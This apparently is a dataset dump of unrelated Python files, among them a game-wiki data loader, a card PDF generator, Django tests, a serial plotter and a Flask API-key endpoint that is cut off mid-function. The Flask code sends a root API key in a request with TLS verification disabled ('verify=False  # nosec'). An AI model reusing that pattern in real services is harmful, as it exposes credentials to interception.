content
stringlengths 5
1.05M
|
|---|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import json
import os
import re
import time
import requests
import js2py
from diskcache import Cache
from SFIWikiBotLib import Config
from SFIWikiBotLib import GeneralUtils
dataCache = Cache(directory=os.path.join(Config.cacheDir, 'cache.gameData'))
# Found at https://darty11.github.io/common.js
# //very expensive function used to fix a bug in the game that prevents engine ranges from containing their items.
# function fixEngines(weaponRanges, weaponData){
# for(rangeId in weaponRanges){
# var range = weaponRanges[rangeId];
# if(range.items.length == 0 && (range.type == 0 || range.type == 4)){
# var id = range.id;
# for(weaponId in weaponData){
#
# if(weaponId.startsWith(id+"_") || weaponId==id){
# var index = 0;
# var end = weaponId.replace(id+"_"," ");
# if(!isNaN(end)){
# index = end;
# }
# range.items[Number(index)] = weaponId;
# weaponData[weaponId].range = range;
# }
# }
# }
# }
# }
def LoadItemDataFromPublicStarfighterWebsite():
itemList = []
itemListWeb = LoadDataFromPublicStarfighterWebsite()['itemList']
for itemWeb in itemListWeb:
item = json.loads(itemWeb['json'].replace('""', '\"'))
itemWeb['json'] = ''
item['__extData'] = itemWeb
itemList.append(item)
return itemList
def LoadShipDataFromPublicStarfighterWebsite():
from SFIWikiBotLib import ShipUtils
shipList = []
shipListWeb = LoadDataFromPublicStarfighterWebsite()['shipList']
for ship in shipListWeb:
if ship['name'].lower() in ShipUtils.shipTurretMapping:
ship['turrets'] = ShipUtils.shipTurretMapping[ship['name'].lower()]
shipList.append(ship)
return shipList
def RefreshPublicData():
data = LoadDataFromPublicStarfighterWebsite.__wrapped__()
dataCache.set(('DataLoader.LoadDataFromPublicStarfighterWebsite',), data, expire=Config.publicDatabaseContentTtl)
def RefreshPrivateData():
funcList = {
'LoadWeaponDataFromBenOldingWebsite': LoadWeaponDataFromBenOldingWebsite,
'LoadWeaponRangesDataFromBenOldingWebsite': LoadWeaponRangesDataFromBenOldingWebsite,
'LoadWeaponVariantDataFromBenOldingWebsite': LoadWeaponVariantDataFromBenOldingWebsite,
'LoadWeaponCraftableDataFromBenOldingWebsite': LoadWeaponCraftableDataFromBenOldingWebsite,
'LoadShipDataFromBenOldingWebsite': LoadShipDataFromBenOldingWebsite,
'LoadSystemDataFromBenOldingWebsite': LoadSystemDataFromBenOldingWebsite,
'LoadGateDataFromBenOldingWebsite': LoadGateDataFromBenOldingWebsite,
'LoadConstantsData': LoadConstantsData,
}
for name, func in funcList.items():
data = func.__wrapped__()
dataCache.set(('DataLoader.' + name,), data, expire=Config.privateDatabaseContentTtl)
jsonpRegex = re.compile(r'.*?\(\s*(["\']).*?\1\s*,\s*(.*)\)', re.S)
def LoadDataFromBenOldingJsonp(dataType):
url = Config.privateDataUrlTemplate
if not '?' in url: url += '?cb={}'
response = requests.get(url.format(dataType, time.time()))
if response.status_code != 200:
print("Got", response.status_code, 'trying to read content from benoldinggames.co.uk for', dataType)
return
content = response.text
m = jsonpRegex.match(content)
return json.loads(m.group(2))
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadWeaponDataFromBenOldingWebsite():
return LoadDataFromBenOldingJsonp('weapons')
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadWeaponRangesDataFromBenOldingWebsite():
return LoadDataFromBenOldingJsonp('ranges')
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadWeaponVariantDataFromBenOldingWebsite():
return LoadDataFromBenOldingJsonp('variant_ranges')
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadWeaponCraftableDataFromBenOldingWebsite():
return LoadDataFromBenOldingJsonp('craftable')
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadShipDataFromBenOldingWebsite():
return LoadDataFromBenOldingJsonp('ships')
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadSystemDataFromBenOldingWebsite():
return LoadDataFromBenOldingJsonp('systems')
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadGateDataFromBenOldingWebsite():
return LoadDataFromBenOldingJsonp('gates')
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadMineralDataFromBenOldingWebsite():
return LoadDataFromBenOldingJsonp('minerals')
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadConstantsData():
rtnData = {}
rtnData['raceData'] = LoadDataFromBenOldingJsonp('races')
rtnData['effectsData'] = LoadDataFromBenOldingJsonp('effects')
rtnData['skillsData'] = LoadDataFromBenOldingJsonp('skills')
rtnData['orgData'] = LoadDataFromBenOldingJsonp('orgs')
lookup = LoadDataFromBenOldingJsonp('lookup')
rtnData['guidanceLookup'] = lookup['guidance']
rtnData['fireSideLookup'] = lookup['fireSide']
rtnData['typeLookup'] = lookup['type']
rtnData['damageTypeLookup'] = [ v.replace('Extaction', 'Extraction') for v in lookup['damageType'] ]
rtnData['effectLookup'] = lookup['effect']
rtnData['augTypeLookup'] = lookup['augType']
rtnData['weaponTypeLookup'] = lookup['weaponType']
rtnData['spawnTypeLookup'] = lookup['spawnType']
rtnData['sectorTypeLookup'] = lookup['sectorType']
rtnData['extraTypeLookup'] = lookup['extraType']
return rtnData
@dataCache.memoize(expire=Config.publicDatabaseContentTtl)
def LoadDataFromPublicStarfighterWebsite():
content = ''
try:
response = requests.get('{}?cb={}'.format(Config.publicDatabaseUrl, time.time()))
response.raise_for_status()
except requests.exceptions.HTTPError as http_err:
print('HTTP error occurred: {}'.format(http_err))
except Exception as err:
print('HTTP error occurred: {}'.format(err))
else:
content = response.text
jsStr = re.sub(r'.*?(var data = \{\};.*)var showing = null;.*', '\\1', content, 0, re.S)
jsContent = 'function getData(){\n' + jsStr + '\nreturn data;\n}'
getData = js2py.eval_js(jsContent)
jsData = getData()
return {
'shipList': jsData['Ships'].to_list(),
'itemList': jsData['Items'].to_list()
}
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadObjectDataFromPrivateStarfighterWebsite():
from SFIWikiBotLib import GalaxyUtils
content = ''
try:
response = requests.get('{}?cb={}'.format(Config.privateObjectListUrl, time.time()))
response.raise_for_status()
except requests.exceptions.HTTPError as http_err:
print('HTTP error occurred: {}'.format(http_err))
except Exception as err:
print('HTTP error occurred: {}'.format(err))
else:
content = response.text
imgBaseUrl = Config.privateObjectListUrl
imgBaseUrl = imgBaseUrl.replace(os.path.basename(imgBaseUrl), '')
rtnData = {
'objectList': [],
'planetList': [],
'anomalyList': [],
'relicList': [],
'structureList': [],
'unknownList': [],
}
objectHtmlList = content.split('<div class="box" style="height:600px;overflow:hidden">')
objectSectionsRegex = re.compile('.*?<h2>(.*?)</h2>.*?<p>(.*?)</p>(.*?)</div>', re.S)
objectStatsRegex = re.compile('.*?<b>([^:]*):\s*</b>(.*?)(</span>)?<br />((?=<)|$)', re.S)
objectImageUrlRegex = re.compile('.*?<img src="(.*?)"', re.S)
objectList = []
for objectHtml in objectHtmlList:
sectionsMatch = objectSectionsRegex.match(objectHtml)
try:
object = {}
object['name'] = sectionsMatch.group(1)
object['statsData'] = {}
object['imageUrl'] = None
statsContent = sectionsMatch.group(2)
statsMatch = objectStatsRegex.match(statsContent)
while statsMatch:
object['statsData'][statsMatch.group(1).strip()] = statsMatch.group(2).strip()
statsContent = statsContent.replace(statsMatch.group(0), '')
statsMatch = objectStatsRegex.match(statsContent)
imageMatch = objectImageUrlRegex.match(sectionsMatch.group(3))
if imageMatch:
object['imageUrl'] = "{}{}".format(imgBaseUrl, imageMatch.group(1))
if object['statsData']['Type'] == 'Object' or object['statsData']['Type'] == 'Objects':
rtnData['objectList'].append(object)
elif object['statsData']['Type'] in GalaxyUtils.planetTypeLookup:
rtnData['planetList'].append(object)
elif object['statsData']['Type'] == 'Anomaly':
rtnData['anomalyList'].append(object)
elif object['statsData']['Type'] == 'Relic':
rtnData['relicList'].append(object)
elif object['statsData']['Type'] == 'Structure':
rtnData['structureList'].append(object)
else:
rtnData['unknownList'].append(object)
except Exception as e:
pass
return rtnData
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
'''
Master Game Gen
1.0b
'''
import os
import sys
import json
from OS_Helper import CleanDirectory, BuildPage, BuildBack
#TSSSF Migration TODO:
#automagickally create vassal module :D
#individual artist naming
#.pon files have symbols like {ALICORN} and so on.
def load_cards_file(path, save_tsssf_converted=True):
path = os.path.abspath(path)
card_set = os.path.split(os.path.dirname(path))[1]
game_folder = os.path.dirname(os.path.dirname(path))
game = os.path.split(game_folder)[1]
with open(path, 'rb') as fp:
if path.endswith('.json'):
# new json format
data = json.loads(fp.read().decode('utf-8-sig', 'replace'))
module = __import__(data['module'])
else:
# old pon format
first_line = fp.readline().decode('utf-8-sig', 'replace').strip()
module = __import__(first_line)
data = {'module': first_line, 'cards': []}
# convert to new format
convert_line = getattr(module, 'convert_line', None)
for line in fp:
line = line.decode('utf-8', 'replace').strip()
if not line or line[0] in ('#', ';', '/'):
continue
line = line.replace(r'\r', '')
if convert_line:
line = convert_line(line)
data['cards'].append(line)
data['game'] = game
data['card_set'] = card_set
# prepare cards
data['cards'] = unpack_card_group(data['cards'], data.get('default'))
data['cards'] = select_focused_cards(data['cards'])
if not path.endswith('.json') and save_tsssf_converted and data['module'] == 'TSSSF_CardGen':
print 'Converting to new format!'
jsonpath = os.path.splitext(path)[0] + '.json'
if os.path.exists(jsonpath):
raise Exception("json file exists, cannot convert")
with open(jsonpath, 'wb') as fp:
fp.write(fancy_json_cards(data).encode('utf-8'))
return module, data
def unpack_card_group(cards, group=None):
union_dicts = ('fonts', 'colors', 'anchors', 'anchors_offset', 'leading')
if not group:
group = {}
unpacked_cards = []
for card in cards:
if 'group' in card and 'cards' in card:
new_group = dict(group)
for key, value in card['group'].items():
if key not in union_dicts or key not in new_group:
new_group[key] = value
continue
new_group[key] = new_group[key].copy()
new_group[key].update(value)
unpacked_cards.extend(unpack_card_group(card['cards'], new_group))
else:
new_card = dict(group)
for key, value in card.items():
if key not in union_dicts or key not in new_card:
new_card[key] = value
continue
new_card[key] = new_card[key].copy()
new_card[key].update(value)
unpacked_cards.append(new_card)
return unpacked_cards
def select_focused_cards(cards):
focused = []
for card in cards:
if card.get('focus') and not card.get('disable'):
focused.append(card)
if not focused:
for card in cards:
if not card.get('disable'):
focused.append(card)
return focused
def fancy_json_cards(data):
from collections import OrderedDict
taglist = ('type', 'picture', 'symbols', 'title', 'keywords', 'body', 'flavor', 'expansion', 'client')
cards = []
for tags in data['cards']:
dtags = []
for tag in taglist:
if tag in tags:
dtags.append((tag, tags[tag]))
cards.append(OrderedDict(dtags))
odata = [('module', data['module']), ('cards', cards)]
odata = OrderedDict(odata)
return json.dumps(odata, sort_keys=False, indent=1, ensure_ascii=False)
def load_translation_files(folder, card_set, module):
# Custom translations: using translation.json file from card set folder and from game folder
count = 0
for tpath in (os.path.join(folder, 'translation.json'), os.path.join(folder, card_set, 'translation.json')):
if not os.path.isfile(tpath):
continue
with open(tpath, 'rb') as fp:
translation = json.loads(fp.read().decode('utf-8-sig', 'replace'))
count += 1
if 'RulesDict' in translation:
module.RulesDict.update(translation['RulesDict'])
if 'CopyrightString' in translation:
module.CopyrightString = translation['CopyrightString']
if 'ArtArtist' in translation:
module.ARTIST = translation['ArtArtist']
return count
def build_cards(module, data):
module.CardSet = data['card_set']
card_set_path = os.path.join(data['game'], data['card_set'])
if 'resources' in data and getattr(module, 'LoadResources', None):
module.LoadResources(data['resources'])
# Create workspace for card images
workspace_path = CleanDirectory(path=card_set_path, mkdir="workspace", rmstring="*.*")
module.workspace_path = workspace_path
# Create image directories
bleed_path = CleanDirectory(path=card_set_path, mkdir="bleed-images", rmstring="*.*")
module.BleedsPath = bleed_path
cropped_path = CleanDirectory(path=card_set_path, mkdir="cropped-images", rmstring="*.*")
module.CropPath = cropped_path
vassal_path = CleanDirectory(path=card_set_path, mkdir="vassal-images", rmstring="*.*")
module.VassalPath = vassal_path
# Create output directory
output_folder = CleanDirectory(path=data['game'], mkdir=data['card_set'], rmstring="*.pdf")
module.CardSetPath = output_folder
pdf = data.get('pdf', {})
page_params = {'extension': pdf.get('pages_extension', 'png')}
if 'dpi' in pdf:
page_params['dpi'] = pdf['dpi']
if 'cut_line_width' in pdf:
page_params['cut_line_width'] = pdf['cut_line_width']
if 'page' in pdf:
page_params['page_width'] = pdf['page'][0]
page_params['page_height'] = pdf['page'][1]
if 'grid' in pdf:
page_params['grid_width'] = pdf['grid'][0]
page_params['grid_height'] = pdf['grid'][1]
else:
page_params['grid_width'] = module.PAGE_WIDTH
page_params['grid_height'] = module.PAGE_HEIGHT
cards_per_page = page_params['grid_width'] * page_params['grid_height']
# Make pages
card_list = []
back_list = []
page_num = 0
count = len(data['cards'])
for index, card in enumerate(data['cards'], 1):
label = card.get('title') or card.get('picture') or card.get('type')
print '[{}/{}] {}'.format(index, count, label.replace('\n', ' ').encode(sys.stdout.encoding, 'replace'))
card_list.append(module.BuildCard(card))
back_list.append(module.BuildBack(card))
# If the card_list is big enough to make a page
# do that now, and set the card list to empty again
if len(card_list) >= cards_per_page:
page_num += 1
print "Building Page {}...".format(page_num)
BuildPage(card_list, page_num, workspace_path, **page_params)
BuildBack(back_list, page_num, workspace_path, **page_params)
card_list = []
back_list = []
# If there are leftover cards, fill in the remaining
# card slots with blanks and gen the last page
if len(card_list) > 0:
# Fill in the missing slots with blanks
while len(card_list) < cards_per_page:
card_list.append(module.BuildCard({"type": "BLANK"}))
back_list.append(module.BuildCard({"type": "BLANK"}))
page_num += 1
print "Building Page {}...".format(page_num)
BuildPage(card_list, page_num, workspace_path, **page_params)
BuildBack(back_list, page_num, workspace_path, **page_params)
#Build Vassal
module.CompileVassalModule()
return workspace_path, output_folder
def generate_pdf(workspace_path, output_folder, card_set):
if sys.platform == 'win32':
print "\nCreating PDF (Windows)..."
if os.path.isfile(r'imagemagick\convert.exe'):
# on windows it working only with ascii path
os.system(ur'imagemagick\convert.exe "{}/page_*.*" "{}/{}.pdf"'.format(
workspace_path.decode('utf-8'),
output_folder,
card_set
))
print "\nCreating PDF of backs..."
os.system(ur'imagemagick\convert.exe "{}/backs_*.*" "{}/backs_{}.pdf"'.format(
workspace_path.decode('utf-8'),
output_folder,
card_set
))
print "Done!"
else:
print "Please download and unpack ImageMagick for Windows into imagemagick directory"
print "PDF was not created"
else:
print "\nCreating PDF (*nix)..."
os.system(ur'convert "{}/page_*.*" "{}/{}.pdf"'.format(
workspace_path.decode('utf-8'),
output_folder,
card_set
).encode('utf-8'))
print "\nCreating PDF of backs..."
os.system(ur'convert "{}/backs_*.*" "{}/backs_{}.pdf"'.format(
workspace_path.decode('utf-8'),
output_folder,
card_set
).encode('utf-8'))
print "Done!"
def main(folder=".", filepath="deck.cards"):
if isinstance(folder, str):
folder = folder.decode('utf-8', 'replace')
if isinstance(filepath, str):
filepath = filepath.decode('utf-8', 'replace')
module, data = load_cards_file(os.path.join(folder, filepath))
load_translation_files(data['game'], data['card_set'], module)
workspace_path, output_folder = build_cards(module, data)
generate_pdf(workspace_path, output_folder, data['card_set'])
if __name__ == '__main__':
#main('TSSSF', '1.1.0 Patch/cards.pon')
#main('TSSSF', '2014 Con Exclusives/cards.pon')
#main('TSSSF', 'BABScon 2015/cards.pon')
#main('TSSSF', 'Core 1.0.5/cards.pon')
#main('TSSSF', 'Core 1.0.5 Delta/cards.pon')
#main('TSSSF', 'Core 1.1.0/cards.pon')
#main('TSSSF', 'Core 1.1.0 Test/cards.pon')
#main('TSSSF', 'Custom Card for/cards.pon')
#main('TSSSF', 'Extra Credit 0.10.4/cards.pon')
main('TSSSF', 'Indiegogo/cards.json')
#main('TSSSF', 'Patreon Expansion 1/cards.pon')
#main('TSSSF', 'Ponycon Panel 2015/cards.pon')
#main('TSSSF', 'Ponyville University 0.0.2/cards.pon')
#main('TSSSF', 'Ponyville University 1.0.1/cards.pon')
#main('TSSSF', 'Ponyville University 1.0.2/cards.pon')
#main('TSSSF', 'Thank You/cards.pon')
#main('BaBOC', 'BaBOC 0.1.0/deck.cards')
|
from django.core.exceptions import ValidationError
from django.test import TestCase
from .models import Block, Transaction
class TestViewAddTransaction(TestCase):
def setUp(self) -> None:
pass
def test_add_transaction_true_1(self):
data = {
"sender":"0123456789012345678901234567890123",
"receiver":"0123456789012345678901234567890124",
"value":10,
"timestamp":"2000-01-01T20:20"
}
res = self.client.post('/chain/add_transaction/', data=data)
res_json = res.json()
self.assertEqual(res.status_code, 200)
self.assertTrue(res_json['OK'])
def test_required_field_false_1(self):
data = {
}
res = self.client.post('/chain/add_transaction/', data=data)
res_json = res.json()
self.assertEqual(res.status_code, 400)
self.assertFalse(res_json['OK'])
self.assertEqual(res_json['message']['sender'][0], 'This field is required.')
self.assertEqual(res_json['message']['receiver'][0], 'This field is required.')
self.assertEqual(res_json['message']['value'][0], 'This field is required.')
self.assertEqual(res_json['message']['timestamp'][0], 'This field is required.')
def test_validate_receiver_sender_false_2(self):
data = {
"sender":"012345678901234567890123456789012",
"receiver":"012345678901234567890123456789012",
"value":10,
"timestamp":"2000-01-01T20:20"
}
res = self.client.post('/chain/add_transaction/', data=data)
res_json = res.json()
self.assertEqual(res.status_code, 400)
self.assertFalse(res_json['OK'])
self.assertEqual(res_json['message']['sender'][0], 'sender address is invalid.')
self.assertEqual(res_json['message']['receiver'][0], 'receiver address is invalid.')
class TestViewAddBlock(TestCase):
def setUp(self) -> None:
Transaction.objects.create(
sender="0123456789012345678901234567890123",
receiver="0123456789012345678901234567890124",
value=10,
timestamp="2000-01-01T20:20"
)
Transaction.objects.create(
sender="0123456789012345678901234567890123",
receiver="0123456789012345678901234567890124",
value=10,
timestamp="2000-01-01T20:20"
)
Transaction.objects.create(
sender="0123456789012345678901234567890123",
receiver="0123456789012345678901234567890124",
value=10,
timestamp="2000-01-01T20:20"
)
Transaction.objects.create(
sender="0123456789012345678901234567890123",
receiver="0123456789012345678901234567890124",
value=10,
timestamp="2000-01-01T20:20"
)
def true_init_add_block(self):
data = {
"hash_block":"0123456789012345678901234567890123",
"prev_block":"",
"transactions":[1,2,3],
"timestamp":"2000-01-01T20:20",
"difficulty":1,
"nonce":1
}
res = self.client.post("/chain/add_block/", data=data)
res_json = res.json()
self.assertEqual(res.status_code, 200)
self.assertTrue(res_json['OK'])
blocks = Block.objects.all()
self.assertEqual(len(blocks), 1)
self.assertEqual(len(blocks[0].transactions.all()), 3)
def true_second_add_block(self):
data = {
"hash_block":"0123456789012345678901234567890124",
"prev_block":"1",
"transactions":[4],
"timestamp":"2000-01-01T20:30",
"difficulty":1,
"nonce":10
}
res = self.client.post("/chain/add_block/", data=data)
self.assertEqual(res.status_code, 200)
res_json = res.json()
self.assertTrue(res_json['OK'])
block:Block = Block.objects.get(id=2)
self.assertIsNotNone(block)
self.assertEqual(len(block.transactions.all()), 1)
def false_init_add_block(self):
pass
def false_second_transaction_add_block(self):
pass
def test_add_block_true_1(self):
self.true_init_add_block()
self.true_second_add_block()
def test_init_block_false_1(self):
data = {
"hash_block":"0123456789012345678901234567890123",
"prev_block":"1",
"transactions":[1,2,3],
"timestamp":"2000-01-01T20:20",
"difficulty":1,
"nonce":1
}
res = self.client.post("/chain/add_block/", data=data)
res_json = res.json()
self.assertEqual(res.status_code, 400)
self.assertFalse(res_json['OK'])
blocks = Block.objects.all()
self.assertEqual(len(blocks), 0)
def test_second_block_false_1(self):
self.true_init_add_block()
data = {
"hash_block":"0123456789012345678901234567890124",
"prev_block":"1",
"transactions":[1],
"timestamp":"2000-01-01T20:30",
"difficulty":1,
"nonce":10
}
res = self.client.post("/chain/add_block/", data=data)
res_json = res.json()
self.assertEqual(res.status_code, 400)
self.assertFalse(res_json['OK'])
block:Block = Block.objects.filter(id=2).first()
self.assertIsNone(block)
|
from typing import List
from django.urls.converters import (
IntConverter,
StringConverter,
)
def path_schema(params) -> List:
"""Generate path params schema"""
items = []
try:
for name, type_ in params[3].items():
if isinstance(type_, IntConverter):
type_str = 'integer'
elif isinstance(type_, StringConverter):
type_str = 'string'
else:
type_str = 'string'
items.append({
'in': 'path',
'name': name,
# 'required': True, # fixme
'schema': {
'type': type_str,
}
})
except IndexError:
pass
return items
|
""" Testing cpuid module
"""
from sys import platform as PLATFORM, path
from os.path import dirname
path.append(dirname(__file__))
from itertools import product
from x86cpu import info, cpuid
from x86cpu.cpuinfo import _bit_mask, _has_bit
import pytest
from info_getters import (Missing, get_sysctl_cpu, get_proc_cpuinfo,
get_wmic_cpu)
pytestmark = pytest.mark.skipif(
PLATFORM not in ('darwin', 'win32') and
not PLATFORM.startswith('linux'),
reason='Valid platforms are OSX, Windows, Linux')
REF_INFO = {}
def setup_module():
global REF_INFO
if PLATFORM == 'darwin':
REF_INFO.update(get_sysctl_cpu())
elif PLATFORM.startswith('linux'):
REF_INFO.update(get_proc_cpuinfo())
elif PLATFORM == 'win32':
REF_INFO.update(get_wmic_cpu())
else:
raise RuntimeError('Was not intending to test platform ' +
PLATFORM)
def test_against_ref():
assert info.vendor == REF_INFO['vendor']
for attr_name in ('extended_family', 'extended_model', 'stepping',
'model_display', 'family_display', 'signature',
'supports_avx', 'supports_avx2'):
if attr_name in REF_INFO and REF_INFO[attr_name] is not Missing:
assert getattr(info, attr_name) == REF_INFO[attr_name]
for feature in ('sse', 'sse2', 'sse3', 'mmx', '3dnow', 'sse4_1', 'sse4_2'):
if feature in REF_INFO['unknown_flags']:
continue
has_feature = feature in REF_INFO['flags']
assert (getattr(info, 'has_' + feature) == has_feature)
def set_bits(bits):
val = 0
for bit in bits:
val += 2**bit
return val
def test_bitmask():
for bit1 in range(32):
for bit2 in range(bit1 + 1, 32):
# Test bit1 through bit2 (inclusive)
bits = range(bit1, bit2 + 1)
assert _bit_mask(bit1, bit2) == set_bits(bits)
def test_has_bit():
assert _has_bit(1, 0)
assert _has_bit(3, 0)
assert _has_bit(3, 1)
assert not _has_bit(0, 2)
assert not _has_bit(0, 1)
assert _has_bit(128, 7)
assert not _has_bit(128, 0)
for bit, no_bit in product(range(32), range(32)):
val = 2**bit
assert _has_bit(val, bit)
if bit != no_bit:
assert not _has_bit(val, no_bit)
def test_smoke():
avx = info.supports_avx
def cmp_reg(a, b):
# ebx appears to be incompletely defined for cpuid(1) call
for regname in ('eax', 'ecx', 'edx'):
assert a[regname] == b[regname]
assert info.reg0 == cpuid(0)
cmp_reg(info.reg1, cpuid(1))
assert info.reg7 == cpuid(7)
assert info.report() is not None
|
#!/usr/bin/env python
#from https://thepoorengineer.com/en/arduino-python-plot/
from threading import Thread
import serial
import time
import collections
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import struct
import copy
import pandas as pd
import numpy as np
class serialPlot:
def __init__(self, serialPort='/dev/ttyUSB0', serialBaud=115200, plotLength=100):
self.port = serialPort
self.baud = serialBaud
self.plotMaxLength = plotLength
self.rawData = ""
self.dataType = None
self.data = []
self.isRun = True
self.isReceiving = False
self.thread = None
self.plotTimer = 0
self.previousTimer = 0
# self.csvData = []
print('Trying to connect to: ' + str(serialPort) + ' at ' + str(serialBaud) + ' BAUD.')
try:
self.serialConnection = serial.Serial(serialPort, serialBaud, timeout=4)
print('Connected to ' + str(serialPort) + ' at ' + str(serialBaud) + ' BAUD.')
self.numPlots=len(self.serialConnection.readline().decode("utf-8").split())
print(f"Number of plots is: {self.numPlots}")
for i in range(self.numPlots): # give an array for each type of data and store them in a list
self.data.append(collections.deque([0] * plotLength, maxlen=plotLength))
except:
print("Failed to connect with " + str(serialPort) + ' at ' + str(serialBaud) + ' BAUD.')
def readSerialStart(self):
if self.thread == None:
self.thread = Thread(target=self.backgroundThread)
self.thread.start()
# Block till we start receiving values
while self.isReceiving != True:
time.sleep(0.1)
def getSerialData(self, frame, lines, lineValueText, pltNumber, axes):
if pltNumber == 0: # in order to make all the clocks show the same reading
currentTimer = time.perf_counter()
self.plotTimer = int((currentTimer - self.previousTimer) * 1000) # the first reading will be erroneous
self.previousTimer = currentTimer
self.privateData = copy.deepcopy(self.rawData) # so that the 3 values in our plots will be synchronized to the same sample time
data = self.privateData.decode("utf-8").split()
value = data[pltNumber].split(':')
self.data[pltNumber].append(int(value[1])) # we get the latest data point and append it to our array
lines.set_data(range(self.plotMaxLength), self.data[pltNumber])
lineValueText.set_text('[' + value[0] + '] = ' + value[1])
axes.relim()
axes.autoscale()
def backgroundThread(self): # retrieve data
time.sleep(1.0) # give some buffer time for retrieving data
self.serialConnection.reset_input_buffer()
while (self.isRun):
self.rawData=self.serialConnection.readline()
self.isReceiving = True
# print(self.rawData)
def close(self):
self.isRun = False
self.thread.join()
self.serialConnection.close()
print('Disconnected...')
# df = pd.DataFrame(self.csvData)
# df.to_csv('/home/rikisenia/Desktop/data.csv')
def makeFigure(xLimit, yLimit, subplot):
xmin, xmax = xLimit
ymin, ymax = yLimit
fig = plt.figure()
axs = [None] * subplot
for i in range(subplot):
if subplot == 1:
axs[i] = fig.add_subplot(1, 1, 1+i)
elif subplot == 2:
axs[i] = fig.add_subplot(2, 1, 1+i)
elif 2 < subplot <= 4:
axs[i] = fig.add_subplot(2, 2, 1+i)
elif 4 < subplot <= 6:
axs[i] = fig.add_subplot(3, 2, 1+i)
elif 6 < subplot <= 9:
axs[i] = fig.add_subplot(3, 3, 1+i)
elif 9 < subplot <= 12:
axs[i] = fig.add_subplot(3, 4, 1+i)
else:
print("Failed to make enough subplots")
axs[i].set_axis_off()
axs[i].set_xlim(xmin, xmax)
axs[i].set_ylim(ymin, ymax)
axs[i].margins(0.05)
return fig, axs
def main():
portName = 'COM5'
baudRate = 115200
maxPlotLength = 100 # number of points in x-axis of real time plot
s = serialPlot(portName, baudRate, maxPlotLength) # initializes all required variables
s.readSerialStart() # starts background thread
# plotting starts below
pltInterval = 50 # Period at which the plot animation updates [ms]
xLimit = (0, maxPlotLength)
yLimit = (0, 100000)
style = ['m-', 'r-', 'g-','b-', 'k-', 'm-', 'r-', 'g-','b-'] # linestyles for the different plots
while len(style) < s.numPlots:
style.append('k-')
anim = []
fig, axs = makeFigure(xLimit, yLimit, s.numPlots)
for i in range(s.numPlots):
lines = axs[i].plot([], [], style[i])[0]
lineValueText = axs[i].text(0.50, 0.90, '', transform=axs[i].transAxes)
anim.append(animation.FuncAnimation(fig, s.getSerialData, fargs=(lines, lineValueText, i, axs[i]), interval=pltInterval, blit=False), ) # fargs has to be a tuple
plt.show()
s.close()
if __name__ == '__main__':
main()
|
"""
Typing.
"""
from typing import Dict, Callable, Tuple, Any, Optional, Set, Generic, TypeVar, Union, List, T
|
# -*- coding: utf-8 -*-
# pragma pylint: disable=unused-argument, no-self-use
"""Function implementation"""
import logging
from resilient_circuits import ResilientComponent, function, handler, StatusMessage, FunctionResult, FunctionError
PACKAGE_NAME = "fn_sdk_test"
class FunctionComponent(ResilientComponent):
"""Component that implements Resilient function 'utilities_attachment_hash''"""
def __init__(self, opts):
"""constructor provides access to the configuration options"""
super(FunctionComponent, self).__init__(opts)
self.options = opts.get(PACKAGE_NAME, {})
@handler("reload")
def _reload(self, event, opts):
"""Configuration options have changed, save new values"""
self.options = opts.get(PACKAGE_NAME, {})
@function("utilities_attachment_hash")
def _utilities_attachment_hash_function(self, event, *args, **kwargs):
"""Function: Calculate hashes for a file attachment. Returns `md5`, `sha1`, `sha256` and other hashes of the file content. Those hashes can then be used as artifacts or in other parts of your workflows."""
try:
# Get the wf_instance_id of the workflow this Function was called in
wf_instance_id = event.message["workflow_instance"]["workflow_instance_id"]
yield StatusMessage("Starting 'utilities_attachment_hash' running in workflow '{0}'".format(wf_instance_id))
# Get the function parameters:
task_id = kwargs.get("task_id") # number
incident_id = kwargs.get("incident_id") # number
attachment_id = kwargs.get("attachment_id") # number
log = logging.getLogger(__name__)
log.info("task_id: %s", task_id)
log.info("incident_id: %s", incident_id)
log.info("attachment_id: %s", attachment_id)
##############################################
# PUT YOUR FUNCTION IMPLEMENTATION CODE HERE #
##############################################
yield StatusMessage("Finished 'utilities_attachment_hash' that was running in workflow '{0}'".format(wf_instance_id))
results = {
"content": "xyz"
}
# Produce a FunctionResult with the results
yield FunctionResult(results)
except Exception:
yield FunctionError()
|
class Solution:
# O(n) time | O(n) space - where n is the number of nodes of BST
def rangeSumBST(self, root: Optional[TreeNode], low: int, high: int) -> int:
def dfs(root):
if not root: return None
if low <= root.val <= high:
self.ans += root.val
if root.left and root.val > low:
dfs(root.left)
if root.right and root.val < high:
dfs(root.right)
self.ans = 0
dfs(root)
return self.ans
|
from flask_restful import Resource, reqparse
from models import db, ApiKeys
from requests import get
import datetime
import secrets
import config
from decorators import restricted_api, admin_api
import errors
import logging
logger = logging.getLogger("api")
class ApiKey(Resource):
@restricted_api
def get(self):
"""
Retrieve API key of the user
---
tags:
- User Management
parameters:
- in: body
name: body
schema:
required:
- user
properties:
user:
type: string
description: user of the SOCA user
responses:
200:
description: Return the token associated to the user
203:
description: No token detected
400:
description: Malformed client input
"""
parser = reqparse.RequestParser()
parser.add_argument("user", type=str, location='args')
args = parser.parse_args()
user = args["user"]
if user is None:
return errors.all_errors("CLIENT_MISSING_PARAMETER", "user (str) parameter is required")
try:
check_existing_key = ApiKeys.query.filter_by(user=user,
is_active=True).first()
if check_existing_key:
return {"success": True, "message": check_existing_key.token}, 200
else:
try:
permissions = get(config.Config.FLASK_ENDPOINT + "/api/ldap/sudo",
headers={"X-SOCA-TOKEN": config.Config.API_ROOT_KEY},
params={"user": user},
verify=False) # nosec
if permissions.status_code == 200:
scope = "sudo"
else:
scope = "user"
api_token = secrets.token_hex(16)
new_key = ApiKeys(user=user,
token=api_token,
is_active=True,
scope=scope,
created_on=datetime.datetime.utcnow())
db.session.add(new_key)
db.session.commit()
return {"success": True,
"message": api_token}, 200
except Exception as err:
return errors.all_errors(type(err).__name__, err)
except Exception as err:
